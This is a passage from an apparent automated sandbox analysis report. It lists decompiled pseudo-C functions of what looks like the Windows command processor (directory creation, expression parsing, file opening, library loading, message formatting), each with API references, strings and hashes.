					L9:
					_t52 =  *(_t93 - 0x214);
					L10:
					_pop(_t90);
					_pop(_t92);
					_pop(_t76);
					return E4A7313A9(_t52, _t76,  *(_t93 - 4) ^ _t93, _t86, _t90, _t92);
				}
			}

0x4a732cb4
0x4a732cb4
0x4a732cb9
0x4a732cbc
0x4a73555d
0x4a735565
0x4a735565
0x4a7342a7
0x4a7342a9
0x4a7342b2
0x4a7354c1
0x4a7354c6
0x4a7354c9
0x00000000
0x00000000
0x00000000
0x4a7342b8
0x4a7342bb
0x4a73660b
0x4a73660b
0x4a7342c1
0x4a7342c1
0x4a7342c8
0x4a7342d2
0x4a7354d4
0x4a7354d4
0x4a7354d6
0x4a7354dc
0x4a7354dc
0x4a7354df
0x4a7354e3
0x4a7354e6
0x4a73553e
0x4a73553e
0x00000000
0x4a73553e
0x4a7354e8
0x4a7354ec
0x4a73c13d
0x4a73c144
0x4a73c147
0x4a73c149
0x4a73c14f
0x4a73c14f
0x4a7354f2
0x4a7354f9
0x4a735528
0x4a735528
0x4a735528
0x4a735529
0x00000000
0x4a735529
0x4a7354fb
0x4a735502
0x00000000
0x00000000
0x4a735505
0x4a73550c
0x4a73550e
0x00000000
0x00000000
0x4a735516
0x4a73551b
0x4a73551d
0x00000000
0x00000000
0x4a73551f
0x4a735526
0x00000000
0x00000000
0x00000000
0x4a735530
0x4a735530
0x4a735530
0x4a735539
0x4a7342d8
0x4a7342db
0x4a7342de
0x4a7342de
0x4a7342e2
0x4a7342e3
0x4a7342ea
0x4a7342ee
0x4a747145
0x4a747148
0x4a74714b
0x4a74714d
0x4a747162
0x4a747166
0x4a74716e
0x4a747175
0x4a74717b
0x4a747180
0x4a747183
0x4a747185
0x4a74718f
0x4a74718f
0x4a74719a
0x4a7471a2
0x00000000
0x4a7471a2
0x4a74714f
0x4a74714f
0x4a747152
0x4a747152
0x4a747156
0x4a747157
0x4a747157
0x4a747160
0x00000000
0x4a747160
0x4a7342f4
0x4a7342f4
0x4a7342fa
0x4a7342fd
0x4a7342fe
0x4a734301
0x4a734308
0x4a734308

APIs

_wcsicmp.MSVCRT ref: 4A732CF2
_wcsicmp.MSVCRT ref: 4A732D06
_wcsicmp.MSVCRT ref: 4A732D1A
_wcsicmp.MSVCRT ref: 4A732D2E
_wcsicmp.MSVCRT ref: 4A732D42
_wcsicmp.MSVCRT ref: 4A732D56

Strings

ERRORLEVEL, xrefs: 4A732CFE
CMDEXTVERSION, xrefs: 4A732D12
TIME, xrefs: 4A732D4E
DATE, xrefs: 4A732D3A
CMDCMDLINE, xrefs: 4A732D26

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$TIME
API String ID: 2081463915-737311213
Opcode ID: 2139fef83535d9e10eb555449cf3d89369083bac7002bfc0841daeff5c8c0ffe
Instruction ID: dc8d7e4d6f200af8b4df836dd35fe03c02a463e6f5da7909a706bd4f37547927
Opcode Fuzzy Hash: 2139fef83535d9e10eb555449cf3d89369083bac7002bfc0841daeff5c8c0ffe
Instruction Fuzzy Hash: 8A11027210D7523DFB690730EC56A492FA9EF12264B22412AEA01DD4A2FF12D908D398

Uniqueness

Uniqueness Score: -1.00%

Function 4A73F83C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E4A73F83C(void* __ebx, void* __edx, void* __esi, WCHAR* _a4) {
				signed int _v8;
				char _v522;
				signed short _v524;
				short _v526;
				short _v528;
				WCHAR* _v532;
				void* __edi;
				signed int _t24;
				long _t28;
				long _t29;
				void* _t32;
				signed short* _t37;
				int _t39;
				signed short* _t40;
				signed short* _t41;
				int _t43;
				long _t45;
				void* _t47;
				void* _t50;
				void* _t60;
				WCHAR* _t61;
				void* _t62;
				void* _t64;
				signed int _t65;

				_t62 = __esi;
				_t60 = __edx;
				_t50 = __ebx;
				_t24 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t24 ^ _t65;
				_t61 = _a4;
				if(_t61[1] != 0x3a) {
					L2:
					_push(_t50);
					_push(_t62);
					_t28 = GetFullPathNameW(_t61, 0x104,  &_v528,  &_v532);
					if(_t28 == 0) {
						_push(0);
						_t29 = GetLastError();
						goto L29;
					} else {
						if(_t28 >= 0x104) {
							_push(_t61);
							_push(1);
							_push(0x400023d9);
							__eflags = _t28 + 1;
							goto L32;
						} else {
							if(CreateDirectoryW(_t61, 0) == 0) {
								_t29 = GetLastError();
								__eflags = _t29 - 0xb7;
								if(_t29 == 0xb7) {
									_push(_t61);
									_push(1);
									_push(0x235c);
									L32:
									E4A736D44(_t52);
									goto L49;
								} else {
									__eflags = _t29 - 3;
									if(_t29 != 3) {
										L34:
										_push(0);
										L29:
										_push(_t29);
										goto L48;
									} else {
										__eflags =  *0x4a754081; // 0x0
										if(__eflags == 0) {
											L16:
											_push(0);
											_push(0x52);
											L48:
											E4A736D44(_t52);
											L49:
											_t32 = 1;
											goto L6;
										} else {
											__eflags = _v526 - 0x3a;
											_t61 = 0x5c;
											_t64 = 2;
											if(_v526 != 0x3a) {
												__eflags = _v528 - _t61;
												if(_v528 != _t61) {
													goto L16;
												} else {
													__eflags = _v526 - _t61;
													if(_v526 != _t61) {
														goto L16;
													} else {
														_t37 =  &_v524;
														_v532 = _t37;
														__eflags = _v524;
														if(_v524 == 0) {
															goto L21;
														} else {
															_t52 = _v524 & 0x0000ffff;
															while(1) {
																__eflags = _t52 - _t61;
																if(_t52 == _t61) {
																	break;
																}
																_t37 = _t37 + _t64;
																_v532 = _t37;
																_t52 =  *_t37 & 0x0000ffff;
																__eflags = _t52;
																if(_t52 != 0) {
																	continue;
																}
																break;
															}
															__eflags =  *_t37;
															if( *_t37 == 0) {
																goto L21;
															} else {
																_t40 = _t37 + _t64;
																_v532 = _t40;
																_t52 =  *_t40 & 0x0000ffff;
																__eflags = _t52;
																if(_t52 == 0) {
																	goto L21;
																} else {
																	while(1) {
																		__eflags = _t52 - _t61;
																		if(_t52 == _t61) {
																			break;
																		}
																		_t40 = _t40 + _t64;
																		_v532 = _t40;
																		_t52 =  *_t40 & 0x0000ffff;
																		__eflags = _t52;
																		if(_t52 != 0) {
																			continue;
																		}
																		break;
																	}
																	__eflags =  *_t40;
																	if( *_t40 != 0) {
																		goto L26;
																	} else {
																		goto L21;
																	}
																}
															}
														}
													}
												}
											} else {
												_t41 =  &_v522;
												L13:
												_v532 = _t41;
												while(1) {
													L20:
													_t52 =  *_t41 & 0x0000ffff;
													__eflags = _t52;
													if(_t52 != 0) {
														goto L17;
													} else {
														break;
													}
													while(1) {
														L17:
														__eflags = _t52 - _t61;
														if(_t52 == _t61) {
															break;
														}
														_t41 = _t41 + _t64;
														_v532 = _t41;
														_t52 =  *_t41 & 0x0000ffff;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															__eflags =  *_t41 - _t61;
															if( *_t41 == _t61) {
																break;
															} else {
																goto L20;
															}
														}
														goto L50;
													}
													_t52 = 0;
													 *_t41 = 0;
													_t43 = CreateDirectoryW( &_v528, 0);
													__eflags = _t43;
													if(_t43 != 0) {
														L25:
														 *_v532 = _t61;
														_t40 = _v532;
														L26:
														_t41 = _t40 + _t64;
														goto L13;
													} else {
														_t45 = GetLastError();
														__eflags = _t45 - 0xb7;
														if(_t45 != 0xb7) {
															goto L16;
														} else {
															goto L25;
														}
													}
													goto L50;
												}
												L21:
												_t39 = CreateDirectoryW( &_v528, 0);
												__eflags = _t39;
												if(_t39 != 0) {
													goto L5;
												} else {
													_t29 = GetLastError();
													__eflags = _t29 - 0xb7;
													if(_t29 == 0xb7) {
														goto L5;
													} else {
														goto L34;
													}
												}
											}
										}
									}
								}
								L50:
							} else {
								L5:
								_t32 = 0;
							}
						}
					}
					L6:
					_pop(_t62);
					_pop(_t50);
				} else {
					_t47 = E4A732B68( *_t61 & 0x0000ffff);
					if(_t47 == 0) {
						_push(_t47);
						_push(0xf);
						E4A736D44(_t52);
						_t32 = 1;
					} else {
						goto L2;
					}
				}
				return E4A7313A9(_t32, _t50, _v8 ^ _t65, _t60, _t61, _t62);
				goto L50;
			}

0x4a73f83c
0x4a73f83c
0x4a73f83c
0x4a73f847
0x4a73f84e
0x4a73f852
0x4a73f85a
0x4a73f86d
0x4a73f86d
0x4a73f86e
0x4a73f884
0x4a73f88e
0x4a748033
0x4a748034
0x00000000
0x4a73f894
0x4a73f896
0x4a748040
0x4a748041
0x4a748043
0x4a748047
0x00000000
0x4a73f89c
0x4a73f8a6
0x4a74241a
0x4a742420
0x4a742425
0x4a748055
0x4a748056
0x4a748058
0x4a748048
0x4a748048
0x00000000
0x4a74242b
0x4a74242b
0x4a74242e
0x4a74805f
0x4a74805f
0x4a74803a
0x4a74803a
0x00000000
0x4a742434
0x4a742434
0x4a74243a
0x4a742465
0x4a742465
0x4a742466
0x4a748103
0x4a748103
0x4a74810a
0x4a74810c
0x00000000
0x4a74243c
0x4a74243c
0x4a742446
0x4a742449
0x4a74244a
0x4a748062
0x4a748069
0x00000000
0x4a74806f
0x4a74806f
0x4a748076
0x00000000
0x4a74807c
0x4a74807c
0x4a748082
0x4a748088
0x4a74808f
0x00000000
0x4a748095
0x4a748095
0x4a74809c
0x4a74809c
0x4a74809f
0x00000000
0x00000000
0x4a7480a1
0x4a7480a3
0x4a7480a9
0x4a7480ac
0x4a7480af
0x00000000
0x00000000
0x00000000
0x4a7480af
0x4a7480b1
0x4a7480b4
0x00000000
0x4a7480ba
0x4a7480ba
0x4a7480bc
0x4a7480c2
0x4a7480c5
0x4a7480c8
0x00000000
0x4a7480ce
0x4a7480ce
0x4a7480ce
0x4a7480d1
0x00000000
0x00000000
0x4a7480d7
0x4a7480d9
0x4a7480df
0x4a7480e2
0x4a7480e5
0x00000000
0x4a7480eb
0x00000000
0x4a7480e5
0x4a74245e
0x4a742461
0x00000000
0x4a742463
0x00000000
0x4a742463
0x4a742461
0x4a7480c8
0x4a7480b4
0x4a74808f
0x4a748076
0x4a742450
0x4a742450
0x4a742456
0x4a742456
0x4a742487
0x4a742487
0x4a742487
0x4a74248a
0x4a74248d
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74246d
0x4a74246d
0x4a74246d
0x4a742470
0x00000000
0x00000000
0x4a742472
0x4a742474
0x4a74247a
0x4a74247d
0x4a742480
0x00000000
0x4a742482
0x4a742482
0x4a742485
0x00000000
0x00000000
0x00000000
0x00000000
0x4a742485
0x00000000
0x4a742480
0x4a7424aa
0x4a7424ac
0x4a7424b7
0x4a7424bd
0x4a7424bf
0x4a7424ce
0x4a7424d6
0x4a7424d9
0x4a7424df
0x4a7424df
0x00000000
0x4a7424c1
0x4a7424c1
0x4a7424c7
0x4a7424cc
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7424cc
0x00000000
0x4a7424bf
0x4a74248f
0x4a742497
0x4a74249d
0x4a74249f
0x00000000
0x4a7424a5
0x4a7480ed
0x4a7480f3
0x4a7480f8
0x00000000
0x4a7480fe
0x00000000
0x4a7480fe
0x4a7480f8
0x4a74249f
0x4a74244a
0x4a74243a
0x4a74242e
0x00000000
0x4a73f8ac
0x4a73f8ac
0x4a73f8ac
0x4a73f8ac
0x4a73f8a6
0x4a73f896
0x4a73f8ae
0x4a73f8ae
0x4a73f8af
0x4a73f85c
0x4a73f860
0x4a73f867
0x4a748021
0x4a748022
0x4a748024
0x4a74802d
0x00000000
0x00000000
0x00000000
0x4a73f867
0x4a73f8bc
0x00000000

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 4A73F884
CreateDirectoryW.KERNEL32(?,00000000), ref: 4A73F89E

Part of subcall function 4A732B68: GetDriveTypeW.KERNEL32(?,?,?,?,4A731571,?,?,4A73745B,-00000003,00000000,00000000,00000000,00000000,?,00000004,?), ref: 4A732B9D

Strings

:, xrefs: 4A74243C

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryDriveFullNamePathType
String ID: :
API String ID: 3208614439-336475711
Opcode ID: 69927e1e5ded5f3d203d81d2e76d0f46281213ba44659b907d00fa7221f6e7f3
Instruction ID: eb37ba0606ddcc7b97fa2f32cfc98aecf7e84c193578538a689722ba6418a568
Opcode Fuzzy Hash: 69927e1e5ded5f3d203d81d2e76d0f46281213ba44659b907d00fa7221f6e7f3
Instruction Fuzzy Hash: A6514DB2A1D21DDADBB09B54CC887EA7FBCEB05750F424496E215DB041E7B48EC8C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 4A73F05C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E4A73F05C(intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v24;
				wchar_t* _t56;
				long _t57;
				long _t65;
				signed int _t70;
				intOrPtr* _t87;

				_t65 = E4A73F123( &_a8) & 0x0000ffff;
				if(_t65 == 0) {
					L23:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t65 == 0x28) {
					_a8 =  &(_a8[0]);
					asm("movsd");
					asm("movsd");
					_push( &_v24);
					asm("movsd");
					E4A73ECB3();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					if(E4A73F123( &_a8) != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 =  &(_a8[0]);
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t65) != 0) {
					_a8 =  &(_a8[0]);
					asm("movsd");
					asm("movsd");
					_push( &_v24);
					asm("movsd");
					E4A73F05C();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_a16 != 0) {
						goto L21;
					}
					E4A73FAF0( &_a8, _t65, _a12);
					goto L9;
				}
				if(iswdigit(_t65) == 0) {
					if(E4A73F176( &_a8,  &_v12,  &_v8) == 0) {
						goto L23;
					} else {
						_a12 = E4A73EB3C(_v12, _v8);
						goto L9;
					}
				}
				_t87 = __imp___errno;
				 *((intOrPtr*)( *_t87())) = 0;
				_t56 = _a8;
				if( *_t56 == 0x30) {
					_t70 = _t56[0] & 0x0000ffff;
					if(_t70 == 0x78) {
						L25:
						_t57 = wcstoul(_t56,  &_a8, 0);
						L6:
						_a12 = _t57;
						if(_t57 == 0x7fffffff) {
							if( *((intOrPtr*)( *_t87())) != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					if(_t70 != 0x58) {
						goto L5;
					}
					goto L25;
				}
				L5:
				_t57 = wcstol(_t56,  &_a8, 0);
				goto L6;
			}

0x4a73f070
0x4a73f078
0x4a7452cb
0x4a7452cb
0x4a73f10c
0x4a73f10f
0x4a73f114
0x4a73f115
0x4a73f116
0x4a73f11b
0x4a73f11b
0x4a73f082
0x4a73f5de
0x4a73f5ea
0x4a73f5eb
0x4a73f5ef
0x4a73f5f0
0x4a73f5f1
0x4a73f5fb
0x4a73f5fc
0x4a73f5fd
0x4a73f602
0x4a73fad8
0x00000000
0x4a73fad8
0x4a73f615
0x4a7452d7
0x4a73f61b
0x4a73f61b
0x4a73f61b
0x00000000
0x4a73f615
0x4a73f098
0x4a73faa0
0x4a73faac
0x4a73faad
0x4a73fab1
0x4a73fab2
0x4a73fab3
0x4a73fabd
0x4a73fabe
0x4a73fabf
0x4a73fac4
0x00000000
0x00000000
0x4a73face
0x00000000
0x4a73face
0x4a73f0aa
0x4a73f27c
0x00000000
0x4a73f282
0x4a73f28d
0x00000000
0x4a73f28d
0x4a73f27c
0x4a73f0b0
0x4a73f0b8
0x4a73f0ba
0x4a73f0c1
0x4a73f2ca
0x4a73f2d2
0x4a7452e3
0x4a7452e9
0x4a73f0d3
0x4a73f0d6
0x4a73f0de
0x4a7452f9
0x00000000
0x00000000
0x4a7452ff
0x00000000
0x4a7452ff
0x4a73f0e4
0x4a73f0f0
0x4a73fadf
0x4a73fadf
0x00000000
0x4a73f0f0
0x4a73f2dc
0x00000000
0x00000000
0x00000000
0x4a73f2e2
0x4a73f0c7
0x4a73f0cd
0x00000000

APIs

wcschr.MSVCRT ref: 4A73F08E
iswdigit.MSVCRT ref: 4A73F0A5
_errno.MSVCRT ref: 4A73F0B6
wcstol.MSVCRT ref: 4A73F0CD
iswdigit.MSVCRT ref: 4A73F0EB
iswalpha.MSVCRT ref: 4A73F0FD
wcstoul.MSVCRT ref: 4A7452E9
_errno.MSVCRT ref: 4A7452F4

Strings

+-~!, xrefs: 4A73F089

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
String ID: +-~!
API String ID: 2191331888-2604099254
Opcode ID: aeec3a97fc7c511b89fdc4e42b6693cbd4e8bf2a44ff97924b650c245ac8cc8a
Instruction ID: 5c52606acf69c03335bbb1a31d6e8dd6aa0b3588c5f7e5b2649bd76821773e06
Opcode Fuzzy Hash: aeec3a97fc7c511b89fdc4e42b6693cbd4e8bf2a44ff97924b650c245ac8cc8a
Instruction Fuzzy Hash: 70414EB680990AABDB60DF54D94499B3BA9EF462A1F128022FD15DF081D774DF0CCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 4A741F83, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121
fileCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E4A741F83(WCHAR* _a4, long _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				signed int _t35;
				WCHAR* _t37;
				void* _t38;
				void* _t40;
				long _t41;
				signed char _t46;
				void* _t48;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				long _t59;
				void* _t61;

				_t46 = _a8;
				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t55 = 3;
				_t35 = _t46 & _t55;
				_t59 = 2;
				_v24.bInheritHandle = 1;
				_v24.nLength = 0xc;
				if(_t35 > _t59) {
					L8:
					_t57 = _t56 | 0xffffffff;
					L7:
					return _t57;
				}
				if((1 & _t46) != 0) {
					if((_t46 & 0x00000008) == 0) {
						goto L2;
					}
					goto L8;
				}
				L2:
				if(_t35 != 0) {
					_a8 = 0x40000000;
					if((_t46 & 0x00000002) != 0) {
						_a8 = 0xc0000000;
					}
					__imp___wcsicmp(_a4, "con");
					_pop(_t48);
					if(_t35 != 0) {
						_a12 = 1;
					}
					_v8 = _t59;
				} else {
					_a8 = 0x80000000;
					_v8 = _t55;
					__imp___wcsicmp(_a4, "con");
					_pop(_t48);
					if(_t35 == 0) {
						_a12 = 1;
					}
				}
				_t37 = E4A732598(_t48, _a4);
				_a4 = _t37;
				if(_v8 == _t59) {
					_t38 = CreateFileW(_t37, _a8, _a12,  &_v24, 3, 0x8000080, 0);
					_v12 = _t38;
					if(_t38 == 0xffffffffffffffff) {
						goto L5;
					}
					__imp___open_osfhandle(_t38, 8);
					_t57 = _t38;
					if(_t57 != 0xffffffffffffffff) {
						goto L7;
					}
					_push(_v12);
					goto L20;
				} else {
					L5:
					_t40 = CreateFileW(_a4, _a8, _a12,  &_v24, _v8, 0x8000080, 0);
					_t61 = _t40;
					if(_t61 == 0xffffffffffffffff) {
						_t41 = GetLastError();
						 *0x4a754128 = _t41;
						if(_t41 == 0x6e) {
							 *0x4a754128 = 2;
						}
						_t57 = 0xffffffffffffffff;
						goto L7;
					}
					__imp___open_osfhandle(_t61, 8);
					_t57 = _t40;
					if(_t57 == 0xffffffffffffffff) {
						_push(_t61);
						L20:
						CloseHandle();
					}
					goto L7;
				}
			}

0x4a741f8b
0x4a741f8e
0x4a741f97
0x4a741f9f
0x4a741fa1
0x4a741fa2
0x4a741fa5
0x4a741fae
0x4a742045
0x4a742045
0x4a74203c
0x4a742042
0x4a742042
0x4a741fb6
0x4a749c21
0x00000000
0x00000000
0x00000000
0x4a749c27
0x4a741fbc
0x4a741fbe
0x4a749c2c
0x4a749c36
0x4a749c38
0x4a749c38
0x4a749c47
0x4a749c4e
0x4a749c51
0x4a749c53
0x4a749c53
0x4a749c56
0x4a741fc4
0x4a741fcc
0x4a741fd3
0x4a741fd6
0x4a741fdd
0x4a741fe0
0x4a749c5e
0x4a749c5e
0x4a741fe0
0x4a741fe9
0x4a741ffa
0x4a742002
0x4a749c76
0x4a749c78
0x4a749c7d
0x00000000
0x00000000
0x4a749c86
0x4a749c8c
0x4a749c92
0x00000000
0x00000000
0x4a749c98
0x00000000
0x4a742008
0x4a742008
0x4a74201b
0x4a74201d
0x4a742021
0x4a749ca6
0x4a749cac
0x4a749cb4
0x4a749cb6
0x4a749cb6
0x4a749cc0
0x00000000
0x4a749cc0
0x4a74202a
0x4a742030
0x4a742036
0x4a749cc7
0x4a749c9b
0x4a749c9b
0x4a749c9b
0x00000000
0x4a742036

APIs

_wcsicmp.MSVCRT ref: 4A741FD6
CreateFileW.KERNEL32(00000000,80000000,00000000,08000080,0000233F,08000080,00000000), ref: 4A74201B
_open_osfhandle.MSVCRT ref: 4A74202A
_wcsicmp.MSVCRT ref: 4A749C47
CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,08000080,00000000), ref: 4A749C76
_open_osfhandle.MSVCRT ref: 4A749C86
CloseHandle.KERNEL32(00000000), ref: 4A749C9B
GetLastError.KERNEL32 ref: 4A749CA6

Strings

con, xrefs: 4A741FC4, 4A749C3F

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile_open_osfhandle_wcsicmp$CloseErrorHandleLast
String ID: con
API String ID: 2772705192-4257191772
Opcode ID: f547028b40facbd14dd194236c6b1d147dfc8d6664a0f681bd5962b2f06165d8
Instruction ID: 4c78b5c8e2f508af1e5431c75cc7390989a6537d841c203c22937a567c5b9df8
Opcode Fuzzy Hash: f547028b40facbd14dd194236c6b1d147dfc8d6664a0f681bd5962b2f06165d8
Instruction Fuzzy Hash: 7A41C57294D205FFEB309FA5C945B9E3FB9EB45361F128029F610DA191DB718A14CB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A73BD84, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E4A73BD84(struct HINSTANCE__* _a4, long* _a8) {
				signed int _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v24;
				CHAR* _v36;
				void _v44;
				char _v48;
				struct HINSTANCE__* _t34;
				signed int _t37;
				long _t39;
				int _t42;
				CHAR* _t46;
				signed short _t48;
				signed int _t49;
				void* _t52;
				struct HINSTANCE__* _t57;
				LONG* _t61;
				long _t62;
				int _t63;

				_t34 = _a4;
				_v8 = _v8 & 0x00000000;
				_t61 =  *((intOrPtr*)(_t34 + 8)) + 0x4a730000;
				_t52 =  *_t61;
				_t46 =  *((intOrPtr*)(_t34 + 4)) + 0x4a730000;
				_t48 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x4a730000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x4a730000 >> 2) * 4);
				_a4 = _t52;
				_t13 = _t48 + 0x4a730002; // 0x94e60002
				_t37 = _t13;
				if(_t48 < 0) {
					_t37 = _t48 & 0x0000ffff;
				}
				_v12 = _t37;
				if(_t52 == 0) {
					_t57 = LoadLibraryExA(_t46, _t52, _t52);
					_a4 = _t57;
					if(_t57 == 0) {
						_t39 = GetLastError();
						if(_t39 == 0x7e || _t39 == 0xc1) {
							_t39 = InterlockedCompareExchange(_t61, 0xffffffff, 0);
							if(_t39 == 0) {
								goto L23;
							} else {
								_a4 = _t39;
								goto L2;
							}
						} else {
							goto L26;
						}
					} else {
						_t42 = InterlockedCompareExchange(_t61, _t57, 0);
						_t63 = _t42;
						if(_t63 != 0) {
							_t39 = FreeLibrary(_t57);
							_a4 = _t63;
						} else {
							_t49 = 8;
							memset( &_v44, _t42, _t49 << 2);
							_v24 = _a4;
							_t39 =  *0x4a73be9c; // 0x0
							_v48 = 0x24;
							_v36 = _t46;
							if(_t39 != 0) {
								_t39 =  *_t39(5,  &_v48);
							}
						}
						goto L2;
					}
				} else {
					L2:
					if(_a4 == 0xffffffff) {
						L23:
						_v8 = 1;
						goto L26;
					} else {
						if(_a4 == 0) {
							L26:
							_push(_v12);
							_push(_t46);
							L4A75241B();
							_t62 = _t39;
						} else {
							_t39 = GetProcAddress(_a4, _v12);
							_t62 = _t39;
							if(_t62 == 0) {
								_t39 = GetLastError();
								if(_t39 != 0x7f) {
									if(_t39 != 0xb6) {
										goto L6;
									} else {
										goto L5;
									}
								} else {
									goto L5;
								}
								L27:
							} else {
								L5:
								_v8 = 1;
							}
							L6:
							if(_t62 == 0) {
								goto L26;
							}
						}
					}
				}
				if(_v8 != 0) {
					 *_a8 = _t62;
				}
				return _t62;
				goto L27;
			}

0x4a73bd8c
0x4a73bd8f
0x4a73bdaf
0x4a73bdb1
0x4a73bdba
0x4a73bdbc
0x4a73bdbe
0x4a73bdc1
0x4a73bdc1
0x4a73bdc9
0x4a74bbc9
0x4a74bbc9
0x4a73bdcf
0x4a73bdd4
0x4a73be40
0x4a73be42
0x4a73be47
0x4a74bbec
0x4a74bbf4
0x4a74bc02
0x4a74bc09
0x00000000
0x4a74bc0b
0x4a74bc0b
0x00000000
0x4a74bc0b
0x00000000
0x00000000
0x00000000
0x4a73be4d
0x4a73be51
0x4a73be56
0x4a73be5a
0x4a74bbdf
0x4a74bbe4
0x4a73be60
0x4a73be62
0x4a73be66
0x4a73be6b
0x4a73be6e
0x4a73be73
0x4a73be7a
0x4a73be7f
0x4a74bbd7
0x4a74bbd7
0x4a73be7f
0x00000000
0x4a73be5a
0x4a73bdd6
0x4a73bdd6
0x4a73bdda
0x4a74bc13
0x4a74bc13
0x00000000
0x4a73bde0
0x4a73bde4
0x4a74bc2f
0x4a74bc2f
0x4a74bc32
0x4a74bc33
0x4a74bc38
0x4a73bdea
0x4a73bdf0
0x4a73bdf5
0x4a73bdf9
0x4a74bc1c
0x4a74bc24
0x4a73be8f
0x00000000
0x4a73be95
0x00000000
0x4a73be95
0x4a74bc2a
0x00000000
0x4a74bc2a
0x00000000
0x4a73bdff
0x4a73bdff
0x4a73bdff
0x4a73bdff
0x4a73be06
0x4a73be08
0x00000000
0x00000000
0x4a73be08
0x4a73bde4
0x4a73bdda
0x4a73be12
0x4a73be17
0x4a73be17
0x4a73be1f
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 4A73BDF0
LoadLibraryExA.KERNEL32(00000000), ref: 4A73BE3B
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 4A73BE51

Strings

$, xrefs: 4A73BE73

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressCompareExchangeInterlockedLibraryLoadProc
String ID: $
API String ID: 792202920-3993045852
Opcode ID: 647ef3cc8b454931111d25df1b560ebbca03977cab30bf4c3fc5679143a7eeee
Instruction ID: d10d513fdd1478567f6895de52e86415f7533e80d95bc3265b8a76ee6989a24c
Opcode Fuzzy Hash: 647ef3cc8b454931111d25df1b560ebbca03977cab30bf4c3fc5679143a7eeee
Instruction Fuzzy Hash: 7541C37290C609ABDB308F58C880BDD7FB4AFE4760F13811AE915AF245D770DA49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 4A74301F, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E4A74301F(void* __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v8;
				char _v40;
				short _v104;
				short _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				long _t30;
				signed int _t35;
				void* _t46;
				intOrPtr _t50;
				void* _t53;
				void* _t55;
				signed int _t56;

				_t53 = __edx;
				_t25 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t25 ^ _t56;
				_t50 = _a4;
				_t55 = FormatMessageW;
				_v112 =  &_a16;
				_v108 = 0;
				_t30 = FormatMessageW(0x1900, 0, _a8, 0,  &_v108, 0xa,  &_v112);
				_v112 = 0;
				if(_t30 == 0) {
					__imp___ultoa(_a8,  &_v40, 0x10);
					_t35 = E4A734B8D(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t35),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_v116 = L"Application";
					if(_a8 < 0x2328) {
						_v116 = L"System";
					}
					if(FormatMessageW(0x3100, 0, 0x13d, 0,  &_v108, 0xa,  &_v120) != 0) {
						goto L1;
					}
					_t46 = 1;
					L4:
					return E4A7313A9(_t46, _t50, _v8 ^ _t56, _t53, 0, _t55);
				}
				L1:
				E4A73AAF4(_t50, _v108);
